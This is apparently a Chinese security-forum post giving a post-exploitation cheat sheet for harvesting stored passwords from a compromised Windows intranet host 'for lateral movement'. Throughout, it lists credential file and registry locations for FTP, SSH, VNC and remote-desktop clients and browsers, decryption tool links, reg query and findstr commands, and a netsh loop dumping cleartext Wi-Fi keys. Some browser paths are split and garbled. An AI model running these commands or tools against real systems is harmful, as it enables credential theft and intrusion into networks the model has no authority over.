内网常见软件密码收集

## 0x00 前言 一般拿到服务器权限后,总需要收集一些运维或网管机子上的密码信息,方便后面横向渗透。 ## 0x01 获取tortoiseSVN连接密码 `tortoiseSVN`客户端连接记录文件位置:...

0x00 前言

一般拿到服务器权限后,总需要收集一些运维或网管机子上的密码信息,方便后面横向渗透。

0x01 获取tortoiseSVN连接密码

tortoiseSVN客户端连接记录文件位置:

%userprofile%\AppData\Roaming\Subversion\auth\svn.simple

文件内容:

解密方法,使用TSvnPwd获取密码:http://www.leapbeyond.com/ric/TSvnPD/TSvnPwd.exe

0x02获取FlashFXP连接密码

主要文件为FlashFXP安装目录下面的Sites.datquick.datquick.dat保存了快速连接的历史记录,Sites.dat保存了站点记录。

  • 解密方法

复制整个FlashFXP安装目录至本地,然后打开flashfxp.exe,点击快速连接->历史,可以看到历史连接记录,并且可以直接连接:

点击站点管理器可以看到保存的连接记录:

使用星号查看器可以直接看到明文密码:

  • 解密方法2

使用FlashfxpPasswordDecryptor破解密码:https://www.cr173.com/soft/26711.html

0x03获取FILEZILLA连接密码

FILEZILLA客户端连接记录保存位置:

%userprofile%\AppData\Roaming\FileZilla\recentservers.xml

使用文本编辑器可以查看到账号密码,用base64解码即可(此处为filezilla3)

0x04获取Serv-U密码

获取ServUDaemon.ini文件:

Serv-U一般安装目录位于“C:\program files\Serv-U\”

密码破解,去掉前面两位字母然后到md5破解,全靠运气,密码也是去掉前面两位字母:

0x05获取VNC连接密码

  • TightVNC

    注册表位置:

    reg query HKEY_CURRENT_USER\Software\TightVNC\Server /v Password
    reg query HKEY_CURRENT_USER\Software\TightVNC\Server /v PasswordViewOnly

    TightVNC version 2.8.X位置:
    reg query HKLM\SOFTWARE\TightVNC\Server /s

vncpwdump破解密码:http://www.cqure.net/tools/vncpwdump-win32-1_0_6.zip

vncpwdump.exe -k 78xxxxxxxx7

  • RealVNC

    注册表位置:
    HKEY_LOCAL_MACHINE\SOFTWARE\RealVNC\vncserver
    3.x 在 HKEY_CURRENT_USER\Software\ORL\WinVNC3\Password ===windows 95
    3.x 在 HKEY_LOCAL_MACHINE\SOFTWARE\ORL\WinVNC3\Default\Password ===Win NT
    4.x 在 HKEY_LOCAL_MACHINE\SOFTWARE\RealVNC\WinVNC4 ===WinXP or Win2003
    5.x 在 HKEY_LOCAL_MACHINE\SOFTWARE\RealVNC\vncserver ===WinXP or Win2003

  • TigerVNC

    注册表位置:
    HKEY_LOCAL_USER\Software\TigerVNC\WinVNC4

  • UltraVNC
    配置文件位置:
    C:\Program Files\UltraVNC\ultravnc.ini

0x06获取xshell记录密码

sessions文件位置:

XShell5 %userprofile%\Documents\NetSarang\Xshell\Sessions
XFtp5 %userprofile%\Documents\NetSarang\Xftp\Sessions
XShell6 %userprofile%\Documents\NetSarang Computer\6\Xshell\Sessions
XFtp6 %userprofile%\Documents\NetSarang Computer\6\Xftp\Sessions

使用Xdecrypt破解xshell保存的密码:https://github.com/dzxs/Xdecrypt

0x07获取SecureCRT记录密码

SecureCRT ini文件位置

%userprofile%\AppData\Roaming\VanDyke\Config\Sessions\

密码解密,获取ini文件中Password V2后面的值,去掉02:

python3 securecrt_password.py dec -v2 f83b09599d3e129xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxe7853c52

0x08获取winscp记录密码

默认注册表位置:

shell reg query "HKEY_USERS\S-1-5-21-****\Software\Martin Prikryl\WinSCP 2\Sessions\root@192.168.190.137" /s
HKEY_USERS\SID\Software\Martin Prikryl\WinSCP 2\Sessions\

WIN7\8下WinSCP文件默认位置:

%userprofile%\AppData\Local\VirtualStore\Program Files (x86)\WinSCP\WinSCP.ini (64位操作系统)
C:\Program Files (x86)\WinSCP\WinSCP.ini (64位操作系统)
%userprofile%\AppData\Local\VirtualStore\Program Files\WinSCP\WinSCP.ini (32位操作系统
C:\Program Files\WinSCP\WinSCP.ini (32位操作系统)

winscppwd破解密码:https://bitbucket.org/knarf/winscppwd/downloads/winscppwd.exe

winscppwd.exe winscp.ini

winscppwd.exe root 10.1xx.x.213 A35C425xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx3B2B6D6F656B696965646E646F8D

0x09获取浏览器信息

一键获取HackBrowserData:https://github.com/moonD4rk/HackBrowserData/

hack-browser-data.exe -b all -f json --dir results --cc

浏览器各类文件地址:

(1)、google

  1. 书签:%userprofile%\AppData\Local\Google\Chrome\User Data\Default\Bookmarks
  2. Cookie: %userprofile%\AppData\Local\Google\Chrome\User Data\Default\Cookies
  3. 浏览历史:%userprofile%\AppData\Local\Google\Chrome\User Data\Default\History
  4. 当前的session:%userprofile%\AppData\Local\Google\Chrome\User Data\Default\Current
  5. Session 账号密码:%userprofile%\AppData\Local\Google\Chrome\User Data\Default\Login
  6. Data %userprofile%\AppData\Local\Google\Chrome\User Data\Profile 1\Login Data

(2)、QQ浏览器

  1. ⽤户数据⽬录:%userprofile%\AppData\Local\Tencent\QQBrowser\User Data\Default
  2. 缓存⽬录:%userprofile%\AppData\Local\Google\Chrome\User Data\Default\Cache\
  3. 各⽂件如下:
  4. 书签:%userprofile%\AppData\Local\Tencent\QQBrowser\UserData\Default\Bookmarks
  5. Cookie: %userprofile%\AppData\Local\Tencent\QQBrowser\UserData\Default\Cookies
  6. 浏览历史:%userprofile%\AppData\Local\Tencent\QQBrowser\UserData\Default\History
  7. 当前的session:%userprofile%\AppData\Local\Tencent\QQBrowser\UserData\Default\CurrentSession
  8. 账号密码:%userprofile%\AppData\Local\Tencent\QQBrowser\UserData\Default\Login
  9. Data %userprofile%\AppData\Local\Tencent\QQBrowser\UserData\Default\xxxxxxxxxxx\6

(3)、360浏览器

  1. `账号密码⽂件:%userprofile%\AppData\Roaming\360se6\User
  2. Data\Default\apps\LoginAssis\assis2.db`

(4)、Firefox

  1. `账号密码⽂件:
  2. %userprofile%\AppData\Roaming\Mozilla\Firefox\Profiles\7s5izkwl.defaultrelease\logins.json`

0x10获取向日葵密码

配置文件位置:

  1. 安装版:C:\Program Files\Oray\SunLogin\SunloginClient\config.ini
  2. 便携版(绿色版):C:\ProgramData\Oray\SunloginClient\config.ini

工具:https://github.com/wafinfo/Sunflower_get_Password\

0x11获取wifi连接密码

for /f "skip=9 tokens=1,2 delims=:" %i in ('netsh wlan show profiles') do @echo %j | findstr -i -v echo | netsh wlan show profiles %j key=clear

0x12获取FinalShell连接密码

以MAC为例,Finalshell保存密码的默认路径为:

/Users/<yourhostname>/Library/FinalShell/conn

FinalShellDecodePass脚本解密:

java FinalShellDecodePass <密文字符串>

0x13获取teamview连接密码

teamviewer-dumper:https://github.com/attackercan/teamviewer-dumper

0x14获取服务端明文存储密码

在一些配置文件或日志里,明文记录着敏感的密码信息,如web.config、config.ini等文件,可通过手动翻查敏感目录,也可以通过findstr命令来查找敏感文件和内容。

findstr /i /s "password" *.config
findstr /i /s "password" *.ini
findstr /i /s "password" *.xml

0x15综合

LaZagnez用于检索存储在本地计算机上的帐户密码的开源程序:
https://github.com/AlessandroZ/LaZagne

  • 发表于 2021-10-25 18:17:28
  • 阅读 ( 10410 )
  • 分类:其他

0 条评论

secES
secES

1 篇文章

站长统计